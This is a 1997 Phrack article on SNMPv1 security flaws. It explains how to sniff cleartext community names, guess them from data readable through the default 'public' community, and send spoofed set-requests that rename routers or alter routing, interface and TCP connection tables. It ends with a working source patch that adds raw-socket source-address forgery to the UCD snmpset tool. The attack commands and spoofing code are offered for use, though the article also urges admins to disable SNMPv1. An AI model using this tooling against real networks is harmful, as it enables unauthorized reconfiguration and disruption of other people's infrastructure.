| .oO Phrack 50 Oo. |
| |
| Volume Seven, Issue Fifty |
| |
| 7 of 16 |
| |
| Network Management Protocol Insecurity: SNMPv1 |
| alhambra [guild] |
| alhambra@infonexus.com |
| |
| |
| As networks have become larger and more complex, a need has been felt by |
| certain portions of the network administration crowd to implement network |
| management protocols. From an administrative point of view, this makes |
| a lot of sense; centralize the administration of the network, and make it |
| convenient and easy for the administrator to monitor and administer changes |
| as needed. As usual, however, from the security point of view, these |
| protocols are a potential for catastrophe. |
| |
| In this article, we'll explore the world of SNMPv1. In two later articles |
| (to be published in later issues of Phrack) we'll look into other network |
| management schemes (SNMPv2, DCE, etc). SNMPv1 has been around for a while. |
| In fact, a number of the problems outlined in this paper have been fixed |
| with the release of SNMPv2. As usual, however, large networks who placed |
| their original administration burdens on SNMPv1 have been slow to change. |
| As a result, large corporations, universities, and some small/cheap ISP's |
| still run their routers/hubs/bridges/hosts/etc with version 1 enabled, often |
| in horribly set up configurations. |
|
|
| The SNMP protocol |
| |
| The SNMP protocol has 5 simple types of messages. They are get-request, |
| get-next-request, set-request, get response and trap. We will concentrate |
| on using the get-* messages to retrieve information from remote sites, routers |
| and the like, and the set-request to manipulate a variety of settings on our |
| target. |
| |
| SNMP uses UDP as it transport mechanism. The basic layout of an SNMP packet |
| is: |
| +-----------------------------------------------------------------------------+ |
| |IP |UDP|Version|Community|PDU |Request|err.|err. |name|value|name|value| ... | |
| |Hdr|Hdr| | |Type| ID |stat|index| | | | | | |
| +-----------------------------------------------------------------------------+ |
|
|
| Community is SNMP's authentication mechanism. PDU type is the type of message |
| being sent (get-request, set request, etc.) Request ID is used to |
| differentiate between requests. Error status is (obviously) used to transport |
| error messages, and error index gives the offset of the variable which was in |
| error. Finally, name and value represent the name of the field requested and |
| either the value to set it to or the value of it on the remote server. These |
| are defined by a MIB written in ASN.1, and encoded using a code called BER. |
| ASN.1 is used to define data and the types and properties of this data. |
| BER is used to actually transmit the data in a platform independent manner |
| (similar perhaps to XDR.) |
| |
| The values that can be fetched and set via SNMP are defined in what is called |
| the Message Information Base or MIB. The MIB is written in ASN.1, and defines |
| all the different variable classes, types, variables and whatnot associated |
| with SNMP. Standard things in the MIB are classes used to define variables |
| associated with data for statistics and values for the system as a whole, the |
| interfaces on the system, (possibly) an address translation table, IP, TCP, |
| UDP, ICMP, and so on, depending on just what kind of system the agent is |
| running on. |
|
|
| Where exactly do SNMPv1's security flaws lie? We can narrow them down to |
| 4 general problem areas: |
| 1) Use of UDP as a transport mechanism |
| 2) Use of clear text community names and the presence |
| of default, overpriveleged communities |
| 3) Information avaialable |
| 4) Ability to remotely modify parameters. |
|
|
| They're all related to one another. We'll go through one by one, define |
| the problem, and explain how it is exploitable. Unfortunately, most of |
| SNMPv1 (from here on out, we'll just call it SNMP) problems stem from its |
| design, and have no easy solution barring the move to SNMPv2 or some other |
| network management protocol. Some common sense, however, can minimize the |
| problems in most situations. |
|
|
|
|
|
|
| UDP as a transport mechanism |
|
|
| I know I'm not alone in feeling that UDP is, at best, a poor idea when |
| used in any sort of application that requires any level of security. The |
| fact that UDP is connectionless leads to a myriad of problems with |
| regard to host based authentication, which unfortunately enough, SNMP uses |
| as one of its mechanisms. So we have 2 basic attacks due to the fact that |
| a UDP transport is used. First, we can easily spoof packets to a server, and |
| modify/add/reconfigure the state of the server. As we're using a spoofed |
| source address, there isn't any way to get the return message, but the |
| machine we are spoofing will simply drop the response message, and the server |
| is none the wiser. Using our 'snmpset' program which has been modified to |
| use a raw socket to allow us to forge the source address, we can modify any |
| value in the MIB defined as read-write ASSUMING WE HAVE A PRIVELEGED COMMUNITY |
| NAME. |
|
|
| snmpset -v 1 -e 10.0.10.12 router.pitiful.com cisco00\ |
| system.sysName.0 s "owned" |
|
|
| Changes our the router name to 'owned', just in case we want to be really |
| obvious that this router has crappy security. |
|
|
| But how do we go about getting a legitimate community name? We have a few |
| different methods we can employ. |
|
|
|
|
| Use of cleartext community names, and default communities |
|
|
| One of the most laughable things about the SNMP protocol is its |
| "authentication" method. I use the term authentication in the loosest |
| sense only, as it makes me cringe when I think about it. SNMP only |
| can authenticate based on two different elements. The source address, as |
| we saw above, it trivial to forge, rendering address based authentication |
| useless. The second method is the use of "community" names. Community names |
| can be thought of as passwords to the SNMP agent. As easily as plaintext |
| password can be sniffed from telnet, rlogin, ftp and the like, we can sniff |
| them from SNMP packets. As a matter of fact, it's easier, as every SNMP |
| packet will have the community name. Grab your favorite sniffer (sniffer, not |
| password sniffer) and head over to your favorite segement running SNMP. My |
| sniffer of choice is 'snoop' so I'll use it as my example, though using any |
| other sniffer should be easy. SNMP uses port 161. The field we're after, the |
| community, is typically 6-8 characters long. Cranking up snoop on my segment |
| reveals the following. (IP's changed to protect the stupid, of course) |
|
|
| # snoop -x 49,15 port 161 |
| Using device /dev/le (promiscuous mode) |
| 10.20.48.94 -> 10.20.19.48 UDP D=161 S=1516 LEN=62 |
| |
| 0: 0572 3232 3135 a028 0202 009c 0201 0002 .r4485.(....... |
|
|
| There we go. Using this community name we're able to grab all the info |
| we want, and modify all the parameter and whatnot we desire. Easy enough... |
| if you're able to sniff the segment. But what happens when you can't? |
|
|
|
|
| Available Information |
|
|
| When you can't sniff the segment, life gets a little more complicated. But |
| only a little. We have a few things on our side that may come in handy. |
| First off, almost always there is a default 'public' community. Very few |
| admin's take the time to deactivate this community, nor realize the risk it |
| poses. Using this community, we can usually read all the information we want. |
| Quite often, being able to read the information gives us enough clues to |
| try to brute force a legitimate community name. |
|
|
| snmpwalk -v 1 router.pitiful.com public system |
| will dump the contents of the system table to us, returning something like: |
|
|
| system.sysDescr.0 = "Cisco Internetwork Operating System Software ..IOS (tm) GS |
| Software (RSP-K-M), Version 11.0(4), RELEASE SOFTWARE (fc1)..Copyright (c) 1986 |
| -1995 by cisco Systems, Inc...Compiled Mon 18-Dec-95 22:54 by alanyu" |
| system.sysObjectID.0 = OID: enterprises.Cisco.1.45 |
| system.sysUpTime.0 = Timeticks: (203889196) 23 days, 14:21:31 |
| system.sysContact.0 = "Jeff Wright" |
| system.sysName.0 = "hws" |
| system.sysLocation.0 = "" |
| system.sysServices.0 = 6 |
|
|
| We see that we're dealing with a cisco router, and we see it's contact's name, |
| and the system name. Same as we might do with guessing passwords, we can use |
| this information to try to piece together a community name. Popular favorites |
| include stuff like 'admin' 'router' 'gateway' and the like, combined with |
| numbers or whatnot. Trying something like 'routerhws' for the above example |
| might work. It might not. While failed attempts are noted, very few people, |
| if any, ever check for them. (as it turns out, the above router had a |
| community name of 'cisco00'. Imaginative, eh?) |
|
|
| Even if only public works, there's lots of interesting things available via |
| SNMP. We can dump routing tables, connection tables, statistics on router use. |
| In certain situations, we can even get information on packet filters in place, |
| and access control rules. All are useful information to have in setting up |
| attacks in conventional manners. Sometimes public is even given r/w on |
| certain tables, and we can do most of what we need to do via that account. |
| When we do have a priveledged community though, the fun begins. |
|
|
|
|
| Remote Manipulation via SNMP |
|
|
| We have all the elements we need to remotely configure the network. We have |
| a community name, we have the ability to forge the manager (the SNMP client) |
| address. All we need to figure out is what we can modify. This really |
| varies. There are a set of defaults that almost every SNMP'able machine |
| will have. In addition to these, though, are the 'enterprise' MIB's, which |
| define vendor specific SNMP tables and fields. There's really too much to go |
| into here. Check out ftp://ftp.cisco.com/ or ftp://ftp.ascend.com/ , for |
| example...most vendors make their MIB's easy to find. Cisco's web page also |
| has a great introduction to their enterprise MIB's, which detail all the |
| differences between different IOS release levels and whatnot. |
| IN the meantime, though, check out the following as fun places to begin: |
|
|
| system.sysContact \ |
| system.sysName |- really sorta pointless to change, but hey...whatever. |
| system.sysLocation / |
|
|
| interfaces.ifTable.ifAdminStatus.n (where n is a number, starting at 0) |
|
|
| at.atTable.atIfIndex.n |
| at.atTable.atPhysAddress.n |
| at.atTable.atNetAddress.n |
|
|
| ip.ipForwarding |
| ip.ipDefaultTTL |
| ip.ipRouteTable.* (there's tons of stuff in this table) |
| ip.ipNetToMediaTable.* (same as above) |
|
|
| tcp.tcpConnState.* (only setable to 12, which deletes the TCB) |
|
|
| and so on. If you have a copy of TCP/IP Illustrated Vol. 1, the SNMP chapter |
| will give you a set of tables with the types of all these values. If you don't |
| have TCP/IP Illustrated, get off your computer and go buy it. |
|
|
| Remember, people don't really like it too much when you muck with their |
| equipment. Act responsibly. |
|
|
| And to the admins reading this: TURN OFF SNMPv1! Think about it. Any time |
| you allow control of you network via the network in a manner as unsafe as |
| how SNMPv1 does it, you're creating more problems for yourself. Realizing |
| its all about acceptable risks, realize this isn't one. Go investigate |
| alternate network management software. Realize, however, there are always |
| going to be problems. (I don't recommend SNMPv2, however...a few months from |
| now when I release my SNMPv2 article and tools, you'll be glad you are not |
| running it) |
|
|
| Resources: |
| The software I use is based on the UCD modifications to the CMU SNMP |
| distribution. It is available at: |
|
|
| ftp://ftp.ece.ucdavis.edu/pub/snmp/ucd-snmp-3.1.3.tar.gz |
|
|
| Following this article there is a patch, which are the modifications to |
| the snmplib to support address spoofing, and modifications to the 'snmpset' |
| app to support them. The patch is only known to work under Solaris, though |
| it should take only minor changes to move it to any other platform. |
|
|
| ftp.cisco.com/pub/mibs and ftp.ascend.com/pub/Software-Releases/SNMP/MIBS |
| contain the enterprise MIBS for a variety of different pieces of hardware. |
| www.cisco.com/univercd/ contains tons of info on a variety of different |
| Cisco hardware and software, including great references on SNMP under IOS. |
|
|
| http://www.cs.tu-bs.de/ibr/cgi-bin/sbrowser.cgi |
|
|
| has a MIB browser, which allows you to use your favorite web client to |
| peruse the standard as well as vendor MIBs on thier site. |
|
|
| RFC's! Yes! All of them. Go to http://www.internic.net/ds/dspg0intdoc.html |
| and read them. Do a search for SNMP and you'll get back tons of hits. |
| They're a little...hrm...terse at times, but these are the defacto definitions |
| of SNMP. Skimming them will give you more info than you can imagine. |
|
|
|
|
| <++> SNMPv1/snmp.diff |
| *** apps/snmpset.c Mon Jan 20 09:07:22 1997 |
| -- apps/snmpset.c Tue Apr 8 17:21:03 1997 |
| *************** |
| *** 77,83 **** |
| |
| void |
| usage(){ |
| ! fprintf(stderr, "Usage: snmpset -v 1 [-q] hostname community [objectID typ |
| e value]+ or:\n"); |
| fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type |
| value]+ or:\n"); |
| fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con |
| text [oID type val]+\n"); |
| fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n"); |
| --- 77,83 ---- |
| |
| void |
| usage(){ |
| ! fprintf(stderr, "Usage: snmpset -v 1 [-e fakeip] [-q] hostname community [ |
| objectID type value]+ or:\n"); |
| fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type |
| value]+ or:\n"); |
| fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con |
| text [oID type val]+\n"); |
| fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n"); |
| *************** |
| *** 85,90 **** |
| --- 85,93 ---- |
| fprintf(stderr, "\t\tn: NULLOBJ, o: OBJID, t: TIMETICKS, a: IPADDRESS\n"); |
| } |
| |
| + extern char *fakeaddr; |
| + extern int nastyflag; |
| + |
| int |
| main(argc, argv) |
| int argc; |
| *************** |
| *** 152,158 **** |
| usage(); |
| exit(1); |
| } |
| ! break; |
| default: |
| printf("invalid option: -%c\n", argv[arg][1]); |
| break; |
| --- 155,165 ---- |
| usage(); |
| exit(1); |
| } |
| ! break; |
| ! case 'e': |
| ! fakeaddr = argv[++arg]; |
| ! nastyflag = 1; |
| ! break; |
| default: |
| printf("invalid option: -%c\n", argv[arg][1]); |
| break; |
| *** snmplib/snmp_api.c Mon Jan 20 10:43:20 1997 |
| -- snmplib/snmp_api.c Tue Apr 8 17:21:08 1997 |
| *************** |
| *** 58,63 **** |
| --- 58,71 ---- |
| #include <sys/select.h> |
| #endif |
| #include <sys/socket.h> |
| + |
| + #include <netinet/in_systm.h> |
| + #include <netinet/in.h> |
| + #include <netinet/ip_var.h> |
| + #include <netinet/ip.h> |
| + #include <netinet/udp.h> |
| + #include <netinet/udp_var.h> |
| + |
| #include <netdb.h> |
| #include "asn1.h" |
| #include "snmp.h" |
| *************** |
| *** 847,852 **** |
| --- 855,882 ---- |
| } |
| return 0; |
| } |
| + /* EVIL STUFF in_cksum for forged ip header */ |
| + unsigned short in_cksum(addr, len) |
| + u_short *addr; |
| + int len; |
| + { |
| + register int nleft = len; |
| + register u_short *w = addr; |
| + register int sum = 0; |
| + u_short answer = 0; |
| + while (nleft > 1) { |
| + sum += *w++; |
| + nleft -= 2; |
| + } |
| + if (nleft == 1) { |
| + *(u_char *)(&answer) = *(u_char *)w ; |
| + sum += answer; |
| + } |
| + sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ |
| + sum += (sum >> 16); /* add carry */ |
| + answer = ~sum; /* truncate to 16 bits */ |
| + return(answer); |
| + } |
| |
| /* |
| * Sends the input pdu on the session after calling snmp_build to create |
| *************** |
| *** 857,862 **** |
| --- 887,894 ---- |
| * On any error, 0 is returned. |
| * The pdu is freed by snmp_send() unless a failure occured. |
| */ |
| + char *fakeaddr = NULL; |
| + int nastyflag = 0; |
| int |
| snmp_send(session, pdu) |
| struct snmp_session *session; |
| *************** |
| *** 1013,1026 **** |
| xdump(packet, length, ""); |
| printf("\n\n"); |
| } |
| |
| ! |
| ! if (sendto(isp->sd, (char *)packet, length, 0, |
| ! (struct sockaddr *)&pdu->address, sizeof(pdu->address)) < 0){ |
| ! perror("sendto"); |
| ! snmp_errno = SNMPERR_GENERR; |
| ! return 0; |
| ! } |
| /* gettimeofday(&tv, (struct timezone *)0); */ |
| tv = Now; |
| if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG |
| --- 1045,1099 ---- |
| xdump(packet, length, ""); |
| printf("\n\n"); |
| } |
| + if(nastyflag == 1) |
| + { |
| + struct ip *ip_hdr; |
| + struct udphdr *udp_hdr; |
| + char *payload; |
| + int socky; |
| + struct sockaddr_in dest; |
| + payload = (char*) malloc |
| + (sizeof(struct ip) |
| + + (sizeof(struct udphdr)) + length); |
| + ip_hdr = (struct ip*) payload; |
| + ip_hdr->ip_v=4; |
| + ip_hdr->ip_hl=5; |
| + ip_hdr->ip_tos=0; |
| + ip_hdr->ip_off=0; |
| + ip_hdr->ip_id=htons(1+rand()%1000); |
| + ip_hdr->ip_ttl=255; |
| + ip_hdr->ip_p=IPPROTO_UDP; |
| + ip_hdr->ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + len |
| gth); |
| + ip_hdr->ip_src.s_addr = inet_addr(fakeaddr); |
| + ip_hdr->ip_dst = pdu->address.sin_addr; |
| + ip_hdr->ip_sum = in_cksum(&ip_hdr,sizeof(ip_hdr)); |
| + |
| + udp_hdr = (struct udphdr *) (payload + sizeof(struct ip)); |
| + udp_hdr->uh_sport = htons(10000+rand()%20000); |
| + udp_hdr->uh_dport = htons(161); |
| + udp_hdr->uh_ulen = htons(length + sizeof(struct udphdr)); |
| + udp_hdr->uh_sum = 0; |
| + memcpy(payload + sizeof(struct udphdr)+sizeof(struct ip),packet,length |
| ); |
| + dest.sin_family = AF_INET; |
| + dest.sin_port = htons(161); |
| + dest.sin_addr = pdu->address.sin_addr; |
| + socky = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); |
| + fprintf(stderr,"Payload size:%d sent\n",sendto(socky,payload,28+length |
| ,0, |
| + (struct sockaddr *)&dest,sizeof(dest))); |
| + exit(0); |
| |
| ! } |
| ! else |
| ! { |
| ! if (sendto(isp->sd, (char *)packet, length, 0, |
| ! (struct sockaddr *)&pdu->address, |
| ! sizeof(pdu->address)) < 0) |
| ! { |
| ! perror("sendto"); |
| ! snmp_errno = SNMPERR_GENERR; |
| ! return 0; |
| ! } |
| ! } |
| /* gettimeofday(&tv, (struct timezone *)0); */ |
| tv = Now; |
| if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG |
| <--> SNMPv1/snmp.diff |
|
|